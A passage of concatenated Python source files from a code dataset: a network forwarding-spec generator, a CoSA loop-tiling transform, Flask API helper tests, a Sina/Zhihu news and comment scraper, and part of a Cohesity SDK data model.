, f6='\n '.join(f6) ))
else:
distances_to_hosts = []
ports_to_hosts = []
for switch in g:
if g.node[switch]['type'] == 'host':
continue
for lan in self.lans:
# Every switch to host forwarding.
for h in lan.hosts:
distances_to_hosts += ["hid == 64'd%d and vid == 12'd%d and dstaddr == 48'h%x: 8'd%d;" % (
switch, h.vlan, h.mac, distances[switch][h.mac])]
ports_to_hosts += ["hid == 64'd%d and vid == 12'd%d and dstaddr == 48'h%x: 16'd%d;" % (
switch, h.vlan, h.mac, out_ports[switch][h.mac])]
# Zone to local gateway forwarding.
if switch in lan.g and switch != lan.router:
distances_to_hosts += ["hid == 64'd%d and vid != 12'd0 and dstaddr == 48'h%x: 8'd%d;" % (
switch, lan.router, distances[switch][lan.router])]
ports_to_hosts += ["hid == 64'd%d and vid != 12'd0 and dstaddr == 48'h%x: 16'd%d;" % (
switch, lan.router, out_ports[switch][lan.router])]
distances_to_hosts = '\n '.join(distances_to_hosts)
ports_to_hosts = '\n '.join(ports_to_hosts)
distances_to_routers = []
ports_to_routers = []
# Router-to-router fabric forwarding.
for switch in self.routers:
for lan in self.lans:
if switch == lan.router or g.node[switch]['type'] == 'host':
continue
distances_to_routers += ["hid == 64'd%d and vid == 12'd0 and dstaddr == 48'h%x: 8'd%d;" % (
switch, lan.router, distances[switch][lan.router])]
ports_to_routers += ["hid == 64'd%d and vid == 12'd0 and dstaddr == 48'h%x: 16'd%d;" % (
switch, lan.router, out_ports[switch][lan.router])]
distances_to_routers = '\n '.join(distances_to_routers)
ports_to_routers = '\n '.join(ports_to_routers)
out.write('''
function l2distance(hid_t hid, vid_t vid, MAC dstaddr): uint<8> =
case {{
{distances_to_hosts}
{distances_to_routers}
default: 8'd0;
}}
'''.format( distances_to_hosts = distances_to_hosts
, distances_to_routers = distances_to_routers ))
# FUNCTION l2NextHop
out.write('''
function l2NextHop(hid_t hid, vid_t vid, MAC dstaddr): uint<16> =
case {{
{ports_to_hosts}
{ports_to_routers}
default: 16'd0;
}}
'''.format( ports_to_hosts = ports_to_hosts
, ports_to_routers = ports_to_routers ))
# FUNCTION cPort
pids = ["pid == pid_t{64'd%d, 16'd%d}" % (n, port)
for n in g
for port in g.node[n]['ports'].values()
if g.node[n]['type'] == 'switch' or g.node[n]['type'] == 'router']
pids = ' or\n '.join(pids)
out.write('''
function cSwitchPort(pid_t pid): bool =
{pids}
'''.format(pids=pids))
# FUNCTION cPort
pids = ["pid == pid_t{64'd%d, 16'd%d}" % (n, port)
for n in g
for port in g.node[n]['ports'].values()
if g.node[n]['type'] == 'router' and port != 1]
pids = ' or\n '.join(pids)
out.write('''
function cRouterPort(pid_t pid): bool =
{pids}
'''.format(pids=pids))
# FUNCTION mac2hid
m = ["mac == 48'h%x: 64'd%d;" % (h.mac, h.mac) for lan in self.lans for h in lan.hosts]
m = '\n '.join(m)
out.write('''
function mac2hid(MAC mac): hid_t =
case {{
{m}
default: 64'd0;
}}
'''.format(m=m))
# FUNCTION hid2mac
m = ["hid == 64'd%d: 48'h%x;" % (h.mac, h.mac) for lan in self.lans for h in lan.hosts]
m = '\n '.join(m)
out.write('''
function hid2mac(hid_t hid): MAC =
case {{
{m}
default: 48'h0;
}}
'''.format(m=m))
# FUNCTION ip2vid
m = ["ip == 32'd%d: 12'd%d;" % (int_of_ip(h.ip), h.vlan) for lan in self.lans for h in lan.hosts]
m = '\n '.join(m)
out.write('''
function ip2vid(IP4 ip): vid_t =
case {{
{m}
default: 12'd0;
}}
'''.format(m=m))
# FUNCTION vidRouter
m = ["vid == 12'd%d: 64'd%d;" % (lan.vlan, lan.router) for lan in self.lans]
m = '\n '.join(m)
out.write('''
function vidRouter(vid_t vid): hid_t =
case {{
{m}
default: 64'd0;
}}
'''.format(m=m))
if __name__ == '__main__':
random.seed(0)
parser = argparse.ArgumentParser()
parser.add_argument( "num_lans"
, help="number of LANs"
, type=int)
parser.add_argument( "num_lan_hosts"
, help="number of hosts per LAN"
, type=int)
parser.add_argument( "num_acl_rules"
, help="number of (hostIP, dstIP) blacklist ACL rules"
, type=int)
parser.add_argument( "num_fabric_switches"
, help="number of switches connecting gateway routers"
, type=int)
parser.add_argument( "num_lan_switches"
, help="number of switches per LAN"
, type=int)
parser.add_argument( "--export_hsa"
, help="Export the configuration information for Spec0 and Spec3 to apply header space analysis."
, type=argparse.FileType('w') )
parser.add_argument( "--export_cocoon"
, help="Export the configuration information for Spec0 and Spec3 to apply Cocoon. (Not yet implemented.)"
, type=argparse.FileType('w') )
parser.add_argument( "--debug"
, help="print debug info"
, action="store_true" )
args = parser.parse_args()
if args.num_lans < 2:
sys.stderr.write('must have at least 2 LANs')
sys.exit(1)
if args.num_lan_hosts < 1:
sys.stderr.write('must have at least 1 host per LAN')
sys.exit(1)
if args.num_acl_rules < 1:
sys.stderr.write('must have at least 1 ACL rule')
sys.exit(1)
if args.num_fabric_switches < 1:
sys.stderr.write('must have at least 1 fabric switch')
sys.exit(1)
if args.num_lan_switches < 1:
sys.stderr.write('must have at least 1 switch per LAN')
sys.exit(1)
p = PurdueNetwork( args )
# spec0 = p.gen_spec_0()
# spec1 = p.gen_spec_1(spec0)
# spec2 = p.gen_spec_2(spec1)
# spec3 = p.gen_spec_3(spec2)
spec01 = p.gen_spec_0_1()
spec11 = p.gen_spec_1_1()
spec21 = p.gen_spec_2_1(spec11)
spec3 = p.gen_spec_3(spec21)
if args.export_cocoon:
p.export_cocoon()
def num_to_spec(n):
if n == 0:
return spec01
if n == 1:
return spec11
if n == 2:
return spec21
if n == 3:
return spec3
for i in xrange(3):
out_file = 'cmp%s%s.prd' % (i, i+1)
print 'Writing Spec%s vs. Spec%s to %s' % (i, i+1, out_file)
out = file(out_file, 'w')
out.write('\n(\n%s\n)\nvlan := 0; ethDst := 0\n' % num_to_spec(i+1))
out.write('\n<=\n\n')
out.write('\n(\n%s\n)\nvlan := 0; ethDst := 0\n' % num_to_spec(i))
out.close()
# Clean up.
if args.export_hsa:
args.export_hsa.close()
if args.export_cocoon:
args.export_cocoon.close()
| StarcoderdataPython |
84229 | from __future__ import annotations
from cmath import cos
import sys
from exo import proc, Procedure, DRAM, config, instr, QAST
import matmap.base as matmap
from matmap.qast_utils.loopReader import *
import matmap.transforms.TilingTransform as ts
import matmap.transforms.ReorderingTransform as rs
from matmap.cosa.src.cosa import *
from matmap.cosa.src.cosa_constants import _A, _B
from matmap.cosa.src.cosa_input_objs import Prob, Arch, Mapspace
class CoSATransform(matmap.CompoundTransform):
#takes in all of CoSA parameters to create this object.
def __init__(self, cosa_parameters, obj):
self.cosa_parameters = cosa_parameters
self.obj = obj
self.run_cosa()
self.subschedules = self.helper()
#runs cosa and assigns variable values to class object values. And also creates
def run_cosa(self):
parser = construct_argparser()
args, unknown = parser.parse_known_args()
prob_path = pathlib.Path(args.prob_path).resolve()
arch_path = pathlib.Path(args.arch_path).resolve()
mapspace_path = pathlib.Path(args.mapspace_path).resolve()
output_path = args.output_dir
status_dict = {}
prob = Prob(prob_path)
arch = Arch(arch_path)
self.tiling_config = prob.prob_factors
# An object defines the user-defined bypass pattern.
mapspace = Mapspace(mapspace_path)
mapspace.init(prob, arch)
# even mapping
B = _B
Z = None
# uneven mapping config
# Z = _Z
# B = None
# partition ratios for W, IA, OA
part_ratios = [
[1, 0, 0],
[0, 0, 1],
[1, 0, 0],
[0, 1, 0],
[0, 0.25, 0.75],
[0.33, 0.33, 0.33],
]
self.factor_config, self.spatial_config, outer_perm_config, self.run_time = cosa(prob, arch, _A, B, part_ratios, global_buf_idx=4,
Z=Z)
#parse cosa permuation output and prepare to create reorder obj
loops = readLoopNest(self.obj)[0]
loop_list = []
for loop in loops:
loop_list.append(loop.name)
loop_order = {}
num = 0
for i in outer_perm_config:
loop_order[i] = loop_list[num]
num += 1
self.perm_config = []
for i in range(len(outer_perm_config)):
self.perm_config.append(loop_order[i])
self.perm_sched = rs.ReorderingTransform(self.perm_config)
#parse cosa tiling_config and prepare to create tiling obj
self.tile_dict = self.tiling_config
def helper(self):
transformations = []
transformations.append(self.perm_sched)
#a 2d list containing the mappings
#order of self.tile_dict has to follow right order of loops -- can change if needed to output dictionary
# [] throws error if it is a tile but can be modified to accomodate that.
#TODO: Error checks
# Tiling Transform
loop_vars = getNestVars(self.obj)
full_tile_dict = {}
tiles = dict()
for i in range(len(loop_vars)):
full_tile_dict[loop_vars[i]] = self.tile_dict[i]
i = 0
while full_tile_dict:
tiles = {}
for x in full_tile_dict.keys():
temp = full_tile_dict[x]
#for case when split is 1 or there is just one number to split loop on
if(temp[0] == 1 or len(temp) == 1):
full_tile_dict[x].pop(0)
continue
tiles[x + "o" * i] = temp[0]
full_tile_dict[x].pop(0)
tile_sched = ts.TilingTransform(tiles)
transformations.append(tile_sched)
delete = [key for key in full_tile_dict if full_tile_dict[key] == []]
for key in delete: del full_tile_dict[key]
i += 1
return transformations
| StarcoderdataPython |
3329419 | from __future__ import absolute_import
from hashlib import md5
from flask import request
from pytest import fixture, raises, mark
from huskar_api import settings
from huskar_api.app import create_app
from huskar_api.api.utils import (
api_response, with_etag, deliver_email_safe, with_cache_control)
from huskar_api.extras.email import EmailTemplate, EmailDeliveryError
from huskar_api.service.exc import DuplicatedEZonePrefixError
from huskar_api.service.utils import (
check_cluster_name, check_cluster_name_in_creation)
from ..utils import assert_response_ok
@fixture
def app():
app = create_app()
app.config['PROPAGATE_EXCEPTIONS'] = False
@app.route('/api/test_etag')
@with_etag
def test_etag():
return api_response(data={
'233': request.args.get('value', '666'),
})
@app.route('/api/test_cache_control')
@with_cache_control
def test_cache_control():
return api_response()
@app.route('/api/test_email')
def test_email():
deliver_email_safe(EmailTemplate.DEBUG, '<EMAIL>', {'foo': 't'})
return api_response()
return app
def test_etag(client):
url = '/api/test_etag'
r = client.get(url)
assert_response_ok(r)
etag = '"{0}"'.format(md5(r.data).hexdigest())
assert r.headers['ETag'] == etag
r = client.get(url, headers={'If-None-Match': etag}, buffered=True)
assert r.status_code == 304
assert r.headers['ETag'] == etag
assert r.data == ''
url = '/api/test_etag?value=233'
r = client.get(url, headers={'If-None-Match': etag}, buffered=True)
assert_response_ok(r)
assert r.headers['ETag'] != etag
assert r.data != ''
def test_cache_control(client, mocker):
url = '/api/test_cache_control'
r = client.get(url)
assert_response_ok(r)
assert 'Cache-Control' not in r.headers
mocker.patch.object(settings, 'CACHE_CONTROL_SETTINGS', {
'test_cache_control': {'max_age': 3, 'public': True},
})
r = client.get(url)
assert_response_ok(r)
assert set(r.headers.get('Cache-Control').split(', ')
) == {'max-age=3', 'public'}
def test_email(client, mocker):
deliver_email = mocker.patch('huskar_api.api.utils.deliver_email')
deliver_email.side_effect = [None, EmailDeliveryError()]
logger = mocker.patch('huskar_api.api.utils.logger', autospec=True)
r = client.get('/api/test_email')
assert_response_ok(r)
logger.exception.assert_not_called()
r = client.get('/api/test_email')
assert_response_ok(r)
logger.exception.assert_called_once()
@mark.parametrize('cluster_name,valid', [
('stable', True),
('stable-altb1', True),
('stable-altb1-stable', True),
('altb1', True),
('altb1-stable', True),
('altb1-altb1-stable', False),
('altb1-altb1-altb1-stable', False),
('altb1-alta1-stable', True),
('altb1-altb1-alta1-stable', False),
('altb1-alta1-alta1-stable', True),
])
def test_check_cluster_name(mocker, cluster_name, valid):
mocker.patch('huskar_api.settings.ROUTE_EZONE_LIST', ['altb1', 'alta1'])
if not valid:
with raises(DuplicatedEZonePrefixError):
check_cluster_name(cluster_name)
else:
assert check_cluster_name(cluster_name)
@mark.parametrize('cluster_name,valid', [
('stable', True),
('stable-altb1', True),
('stable-altb1-stable', True),
('altb1', True),
('altb1-stable', True),
('altb1-altb1-stable', False),
('altb1-altb1-altb1-stable', False),
('altb1-alta1-stable', True),
('altb1-altb1-alta1-stable', False),
('altb1-alta1-alta1-stable', True),
])
def test_check_cluster_name_in_creation(mocker, cluster_name, valid):
mocker.patch('huskar_api.settings.ROUTE_EZONE_LIST', ['altb1', 'alta1'])
if not valid:
with raises(DuplicatedEZonePrefixError):
check_cluster_name_in_creation(cluster_name)
else:
assert check_cluster_name_in_creation(cluster_name)
| StarcoderdataPython |
3278434 | <filename>ReptileStrategy.py
import os
import re
import urllib
import urllib.request
import time
import requests
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from bs4 import BeautifulSoup
class ReptileStrategy:
MODE_OF_STATIC = 0
MODE_OF_DYNAMIC = 1
MODE_OF_FAST_DYNAMIC = 2
def __init__(self, URL, mode=MODE_OF_STATIC, e_id=""):
# 默认爬静态页面
os.environ['http_proxy'] = ''
# 保留URL
self.originalURL = URL
self.mode = mode
# 设置driver或bsObj
if mode == self.MODE_OF_STATIC:
# 设置Request信息 获取Html文本
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
req = urllib.request.Request(url=URL, headers=headers)
html = urllib.request.urlopen(req)
self.bsObj = BeautifulSoup(html, features="html.parser")
elif mode == self.MODE_OF_DYNAMIC:
# timeA = time.time()
self.bsObj = self.driverInit()
# timeB = time.time()
# print("Normal", timeB-timeA)
elif mode == self.MODE_OF_FAST_DYNAMIC:
timeA = time.time()
self.bsObj = self.driverInit_Fast(e_id)
timeB = time.time()
print("Fast", timeB - timeA)
def driverInit(self):
"""
use driver to resolve JS
and then close it
:return prepared bsObj
"""
options = webdriver.ChromeOptions()
options.add_argument("--headless")
driver = webdriver.Chrome(executable_path="chromedriver.exe", options=options)
driver.set_page_load_timeout(40)
try:
# 无限循环
driver.get(self.originalURL)
driver.execute_script('window.scrollTo(0,document.body.scrollHeight)')
except Exception as e:
print(e)
driver.close()
return self.driverInit()
bsObj = BeautifulSoup(driver.page_source, features="html.parser")
time.sleep(2)
driver.close()
return bsObj
def driverInit_Fast(self, e_id):
# 不是这方法跑的比那个还慢= =
# 配置一个参数,就是页面加载策略,系统默认是等待,就是等他加载完,直接设置成none,就是不等待,这样就是get操作完后直接就是结束了
desired_capabilities = DesiredCapabilities.PHANTOMJS
desired_capabilities["pageLoadStrategy"] = "none"
options = webdriver.ChromeOptions()
options.add_argument("--headless")
driver = webdriver.Chrome(executable_path="chromedriver.exe", options=options)
try:
driver.get(self.originalURL)
wait = WebDriverWait(driver, 40, 0.5)
wait.until(lambda d: d.find_element_by_id('bottom_sina_comment'))
# wait.until(lambda d: d.find_element_by_class_name('hd clearfix'))
time.sleep(3)
except Exception as e:
print(e)
return self.__init__(self.originalURL, self.MODE_OF_STATIC)
# bs 时间忽略不计
bsObj = BeautifulSoup(driver.page_source, features="html.parser")
driver.close()
return bsObj
def get_Title(self):
pass
def get_Content(self):
pass
def get_URL(self):
pass
class Jsty_Strategy(ReptileStrategy):
# 荔枝网 时间戳可以从URL看出了,感觉不用特地读
# 按助教的意思好像是,通过这几个网站来反向筛选 信息源?
def __init__(self, URL):
super.__init__(URL)
def get_Title(self):
return self.bsObj.head.title.get_text()
def get_Content(self):
# 好坑啊 get_text是个方法不是个属性
info = self.bsObj.find("p", {"class": "info fL"})
time = info.find("span", {"class": "time"}).get_text()
source = info.find("span", {"class": "source"}).get_text()
content = self.bsObj.find("div", {"class": "content"}).findAll("p")
file = open("testArticle.txt", "a", encoding='utf-8')
file.write("标题: " + self.get_Title() + "\n")
file.write("时间: " + time + "\n")
file.write("来源: " + source + "\n")
for p in content:
file.write(p.get_text() + "\n")
file.write("-----------END-------------\n")
file.close()
class Sina_Strategy(ReptileStrategy):
# https://search.sina.com.cn/?q=%E6%96%B0%E5%86%A0&c=news&range=all&stime=2020-01-01&etime=2020-06-01&time=2020&page=2
# https://search.sina.com.cn/?q=%E6%96%B0%E5%86%A0&c=news&range=all&time=2020&stime=2020-01-01%2000:00:00&etime=2020-06-01%2023:59:59&num=20
# 我不会爬JS 只能URL分析法了= = (查询内容的UTF编码(此处为新冠)) (年份)
def get_Title(self):
return self.bsObj.find("h1", {"class": "main-title"}).get_text()
# 第一次入库用 只记录来源 时间 url
def get_Simple_Content(self):
time = self.bsObj.find("span", {"class": "date"}).get_text()
# time = time[0:4]+time[5:7]+time[8:10] # 20200601 年月日
# '2020-01-22+99:00:00&'
etime = time[0:4] + "-" + time[5:7] + "-" + time[8:10] + "+" + time[12:18] + ":00&"
time = time[2:4] + time[5:7] + time[8:10] + time[12:14] # 20 年 06 月 01日 23时
try:
source = self.bsObj.find("a", {"class": "source"}).get_text()
except AttributeError as e:
print(e)
source = "来源不明"
url = self.originalURL
# 还能这么弄
res = [source, time, url, etime]
return res
# include time article source
def get_Content(self):
article = self.bsObj.find("div", {"id": "article"}).findAll("p")
time = self.bsObj.find("span", {"class": "date"}).get_text()
source = self.bsObj.find("a", {"class": "source"}).get_text()
file = open("testArticle.txt", "a", encoding='utf-8')
file.write("标题: " + self.get_Title() + "\n")
file.write("时间: " + time + "\n")
file.write("来源: " + source + "\n")
for p in article:
file.write(p.get_text() + "\n")
file.write("-----------END-------------\n")
file.close()
def get_Comment_Resolve(self):
assert self.mode == self.MODE_OF_DYNAMIC
hd_clearfix = self.bsObj.find("div", {"id": "bottom_sina_comment"})
comment_s_a = hd_clearfix.find("a", {"data-sudaclick": "comment_sum_p"})
if comment_s_a is None:
# 加载错误
raise LoadMissException(self.originalURL)
# comment_url = comment_s_a.attrs['href']
comment = []
# 1. 爬取最热评论
comment_div = hd_clearfix.find("div", {"comment-type": "hotList"}).findAll("div", {"class": "item clearfix"})
for div in comment_div:
comment.append(div.find("div", {"class": "txt"}).get_text())
# 2. 爬取最新评论
try:
# todo Something wrong
comment_div = hd_clearfix.find("div", {"comment-type": "latestList"}).findAll("div",
{"class": "item clearfix"})
for div in comment_div:
comment.append(div.find("div", {"class": "txt"}).get_text())
except Exception as e:
print("sina_getcomment" + e)
comment_sum = int(comment_s_a.get_text())
return [comment_sum, comment]
def get_Comment_Request(self):
"""
:return:[[attendance ,comment_sum], comment[[cmnProvince, cmntime, cmn.get('content')]]]
"""
assert self.mode == self.MODE_OF_STATIC
sina_comment_server = "http://comment5.news.sina.com.cn/page/info?"
newsid = self.getNewsID()
channel = self.getChannel()
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
param = {
"format": 'json',
'channel': channel,
'newsid': newsid,
'page': '1'
}
for i in range(5):
response = requests.get(sina_comment_server, params=param, headers=headers)
res = response.json()['result']
# 从JSON 格式中获取所需内容
try:
comment_sum = res['count'].get("show")
comment_attendance = res['count'].get('total')
comment = []
break
except Exception as e:
if i <= 3:
print("小歇一下-PhaseA")
time.sleep(0.5)
continue
else:
file = open("../Log/runTimeExceptionUrls.txt", "a+")
file.writelines(self.originalURL + "\n")
print(e, end="")
print(self.originalURL)
if not res.get('cmntlist'):
raise RequestMissException(self.originalURL)
# return [0, []]
cmntlist = res['cmntlist']
for cmn in cmntlist:
cmntime = cmn.get('time').replace("-", "").replace(" ", "")
cmntime = cmntime[2:10]
cmnProvince = cmn.get('area')[0:2]
# todo 可能有bug
rank = cmn.get('rank')
comment.append([cmnProvince, cmntime, cmn.get('content'), rank])
# Many Pages
if comment_sum >= 20:
for i in range(2, int(comment_sum / 20)):
for j in range(0, 4):
param['page'] = str(i)
response = requests.get(sina_comment_server, params=param, headers=headers)
res = response.json()['result']
# 从JSON 格式中获取所需内容
try:
# res = response.json()['result']
res['count'].get("show")
break
except Exception as e:
if j <= 3:
print("Sleep:PhaseB For page " + str(i) + " For time " + str(j))
time.sleep(0.5)
continue
else:
print(e, end="")
print(self.originalURL)
try:
cmntlist = res['cmntlist']
for cmn in cmntlist:
cmntime = cmn.get('time').replace("-", "").replace(" ", "")
cmntime = cmntime[2:10]
cmnProvince = cmn.get('area')[0:2]
# todo 可能有bug
rank = cmn.get('rank')
comment.append([cmnProvince, cmntime, cmn.get('content'), rank])
except Exception as e:
print(e, end="")
print("这里不应该有问题", end="")
print(self.originalURL)
# 简单的数据清洗
return [[comment_attendance, comment_sum], comment]
def getURL(self):
urlSet = set()
res = self.bsObj.findAll("div", {"class": "box-result clearfix"})
for div in res:
# oneUrl = div.find("h2").find("a", {"href": re.compile("https://news\.sina\.com(.*)")})
oneUrl = div.find("h2").find("a", {"href": re.compile("https://news\.sina\.com\.cn/(c|o|zx|gov|w|s)(.*)")})
if oneUrl is not None:
oneUrl = oneUrl.attrs['href']
else:
continue
if oneUrl not in urlSet:
urlSet.add(oneUrl)
return urlSet
# 通过url page+1
def getNextPage(self):
res = self.originalURL
index = self.originalURL.find("page=")
page_num = res[index + 5:]
next_page_num = str(int(page_num) + 1)
res = res[0:index + 5] + next_page_num
return res
def getNewsID(self):
matchObj = re.search(r"doc-i(.+?)\.shtml", self.originalURL, re.M | re.I)
return "comos-" + matchObj.group(1)
def getChannel(self):
pattern = re.compile(r"var SINA_TEXT_PAGE_INFO = (.*?);$", re.MULTILINE | re.DOTALL)
script = self.bsObj.find("script", text=pattern).contents[0]
matchObj = re.search(r"channel: '(.*?)',", script, re.M | re.I)
m = matchObj.group(1)
return m
class Zhihu_Strategy(ReptileStrategy):
def __init__(self, URL):
super().__init__(URL)
def get_Content(self):
content = self.bsObj.find("div", {"class": "RichContent-inner"})
content = content.find("span")
s = str(content) # 转换成字符串
s_replace = s.replace('<br/>', "\n") # 用换行符替换'<br/>'
title = self.bsObj.find("h1", {"class": "QuestionHeader-title"}).get_text()
file = open(title + ".txt", "a", encoding='utf-8')
file.write("标题: " + title + "\n")
file.write(s_replace + "\n")
file.write("-----------END-------------\n")
file.close()
class LoadMissException(Exception):
"""
不知道为什么加载出了div 但是没有 comment
"""
def __init__(self, url):
self.url = url
def __str__(self):
return "加载错误 " + self.url
class RequestMissException(Exception):
"""
不能用Request的部分网页
"""
def __init__(self, url):
self.url = url
def __str__(self) -> str:
return "Request 解析错误" + self.url
def save(self):
file = open("../Log/requestErrorUrls.txt", "a+")
log = open("../Log/log.txt", "a+")
file.writelines(self.url + "\n")
log.writelines("Request 解析错误" + self.url + " " + time.asctime(time.localtime(time.time())) + "\n")
class ModeException(Exception):
"""
加载格式错误
"""
def __str__(self) -> str:
return "Mode Exception"
| StarcoderdataPython |
4827189 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
import cohesity_management_sdk.models.entity_proto
import cohesity_management_sdk.models.deploy_v_ms_to_cloud_task_state_proto
import cohesity_management_sdk.models.destroy_clone_app_task_info_proto
import cohesity_management_sdk.models.destroy_cloned_vm_task_info_proto
import cohesity_management_sdk.models.destroy_mount_volumes_task_info_proto
import cohesity_management_sdk.models.error_proto
import cohesity_management_sdk.models.connector_params
import cohesity_management_sdk.models.user_information
class DestroyClonedTaskStateProto(object):
"""Implementation of the 'DestroyClonedTaskStateProto' model.
TODO: type model description here.
Attributes:
clone_task_name (string): The name of the clone task.
datastore_entity (EntityProto): Specifies the attributes and the
latest statistics about an entity.
deploy_vms_to_cloud_task_state (DeployVMsToCloudTaskStateProto): TODO:
type description here.
destroy_clone_app_task_info (DestroyCloneAppTaskInfoProto): Each
available extension is listed below along with the location of the
proto file (relative to magneto/connectors) where it is defined.
DestroyCloneAppTaskInfoProto extension Location Extension
===================================================================
==========
sql::DestroyCloneTaskInfo::sql_destroy_clone_app_task_info
sql/sql.proto 100
oracle::DestroyCloneTaskInfo::oracle_destroy_clone_app_task_info
oracle/oracle.proto 101
ad::DestroyTaskInfo::ad_destroy_app_task_info ad/ad.proto 102
===================================================================
==========
destroy_clone_vm_task_info (DestroyClonedVMTaskInfoProto): Each
available extension is listed below along with the location of the
proto file (relative to magneto/connectors) where it is defined.
DestroyClonedVMTaskInfoProto extension Location
Extension
===================================================================
========== vmware::DestroyClonedTaskInfo::
vmware_destroy_cloned_vm_task_info vmware/vmware.proto
100 hyperv::DestroyClonedTaskInfo::
hyperv_destroy_cloned_vm_task_info hyperv/hyperv.proto
101
===================================================================
==========
destroy_mount_volumes_task_info (DestroyMountVolumesTaskInfoProto):
TODO: type description here.
end_time_usecs (long|int): If the destroy clone task has finished,
this field contains the end time of the task.
error (ErrorProto): TODO: type description here.
folder_entity (EntityProto): Specifies the attributes and the latest
statistics about an entity.
full_view_name (string): The full external view name where cloned
objects are placed.
parent_source_connection_params (ConnectorParams): Message that
encapsulates the various params required to establish a connection
with a particular environment.
parent_task_id (long|int): The id of the task that triggered the
destroy task. This will be used by refresh task to mark the
destroy task as internal sub-task.
perform_clone_task_id (long|int): The unique id of the task that
performed the clone operation.
restore_type (int): The type of the restore/clone operation that is
being destroyed.
scheduled_constituent_id (long|int): Constituent id (and the gandalf
session id) where this task has been scheduled. If -1, the task is
not running at any slave. It's possible that the task was
previously scheduled, but is now being re-scheduled.
scheduled_gandalf_session_id (long|int): TODO: type description here.
start_time_usecs (long|int): The start time of this destroy clone
task.
status (int): Status of the destroy clone task.
task_id (long|int): A globally unique id of this destroy clone task.
mtype (int): The type of environment that is being operated on.
user (string): The user who requested this destroy clone task.
user_info (UserInformation): A message to encapsulate information
about the user who made the request. Request should be filtered by
these fields if specified so that only the objects that the user
is permissioned for are returned. If both sid_vec & tenant_id are
specified then an intersection of respective results should be
returned.
view_box_id (long|int): The view box id to which 'view_name' belongs
to.
view_name_deprecated (string): The view name as provided by the user
for the clone operation.
"""
# Create a mapping from Model property names to API property names
_names = {
"clone_task_name":'cloneTaskName',
"datastore_entity":'datastoreEntity',
"deploy_vms_to_cloud_task_state":'deployVmsToCloudTaskState',
"destroy_clone_app_task_info":'destroyCloneAppTaskInfo',
"destroy_clone_vm_task_info":'destroyCloneVmTaskInfo',
"destroy_mount_volumes_task_info":'destroyMountVolumesTaskInfo',
"end_time_usecs":'endTimeUsecs',
"error":'error',
"folder_entity":'folderEntity',
"full_view_name":'fullViewName',
"parent_source_connection_params":'parentSourceConnectionParams',
"parent_task_id":'parentTaskId',
"perform_clone_task_id":'performCloneTaskId',
"restore_type":'restoreType',
"scheduled_constituent_id":'scheduledConstituentId',
"scheduled_gandalf_session_id":'scheduledGandalfSessionId',
"start_time_usecs":'startTimeUsecs',
"status":'status',
"task_id":'taskId',
"mtype":'type',
"user":'user',
"user_info":'userInfo',
"view_box_id":'viewBoxId',
"view_name_deprecated":'viewName_DEPRECATED'
}
def __init__(self,
clone_task_name=None,
datastore_entity=None,
deploy_vms_to_cloud_task_state=None,
destroy_clone_app_task_info=None,
destroy_clone_vm_task_info=None,
destroy_mount_volumes_task_info=None,
end_time_usecs=None,
error=None,
folder_entity=None,
full_view_name=None,
parent_source_connection_params=None,
parent_task_id=None,
perform_clone_task_id=None,
restore_type=None,
scheduled_constituent_id=None,
scheduled_gandalf_session_id=None,
start_time_usecs=None,
status=None,
task_id=None,
mtype=None,
user=None,
user_info=None,
view_box_id=None,
view_name_deprecated=None):
"""Constructor for the DestroyClonedTaskStateProto class"""
# Initialize members of the class
self.clone_task_name = clone_task_name
self.datastore_entity = datastore_entity
self.deploy_vms_to_cloud_task_state = deploy_vms_to_cloud_task_state
self.destroy_clone_app_task_info = destroy_clone_app_task_info
self.destroy_clone_vm_task_info = destroy_clone_vm_task_info
self.destroy_mount_volumes_task_info = destroy_mount_volumes_task_info
self.end_time_usecs = end_time_usecs
self.error = error
self.folder_entity = folder_entity
self.full_view_name = full_view_name
self.parent_source_connection_params = parent_source_connection_params
self.parent_task_id = parent_task_id
self.perform_clone_task_id = perform_clone_task_id
self.restore_type = restore_type
self.scheduled_constituent_id = scheduled_constituent_id
self.scheduled_gandalf_session_id = scheduled_gandalf_session_id
self.start_time_usecs = start_time_usecs
self.status = status
self.task_id = task_id
self.mtype = mtype
self.user = user
self.user_info = user_info
self.view_box_id = view_box_id
self.view_name_deprecated = view_name_deprecated
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
clone_task_name = dictionary.get('cloneTaskName')
datastore_entity = cohesity_management_sdk.models.entity_proto.EntityProto.from_dictionary(dictionary.get('datastoreEntity')) if dictionary.get('datastoreEntity') else None
deploy_vms_to_cloud_task_state = cohesity_management_sdk.models.deploy_v_ms_to_cloud_task_state_proto.DeployVMsToCloudTaskStateProto.from_dictionary(dictionary.get('deployVmsToCloudTaskState')) if dictionary.get('deployVmsToCloudTaskState') else None
destroy_clone_app_task_info = cohesity_management_sdk.models.destroy_clone_app_task_info_proto.DestroyCloneAppTaskInfoProto.from_dictionary(dictionary.get('destroyCloneAppTaskInfo')) if dictionary.get('destroyCloneAppTaskInfo') else None
destroy_clone_vm_task_info = cohesity_management_sdk.models.destroy_cloned_vm_task_info_proto.DestroyClonedVMTaskInfoProto.from_dictionary(dictionary.get('destroyCloneVmTaskInfo')) if dictionary.get('destroyCloneVmTaskInfo') else None
destroy_mount_volumes_task_info = cohesity_management_sdk.models.destroy_mount_volumes_task_info_proto.DestroyMountVolumesTaskInfoProto.from_dictionary(dictionary.get('destroyMountVolumesTaskInfo')) if dictionary.get('destroyMountVolumesTaskInfo') else None
end_time_usecs = dictionary.get('endTimeUsecs')
error = cohesity_management_sdk.models.error_proto.ErrorProto.from_dictionary(dictionary.get('error')) if dictionary.get('error') else None
folder_entity = cohesity_management_sdk.models.entity_proto.EntityProto.from_dictionary(dictionary.get('folderEntity')) if dictionary.get('folderEntity') else None
full_view_name = dictionary.get('fullViewName')
parent_source_connection_params = cohesity_management_sdk.models.connector_params.ConnectorParams.from_dictionary(dictionary.get('parentSourceConnectionParams')) if dictionary.get('parentSourceConnectionParams') else None
parent_task_id = dictionary.get('parentTaskId')
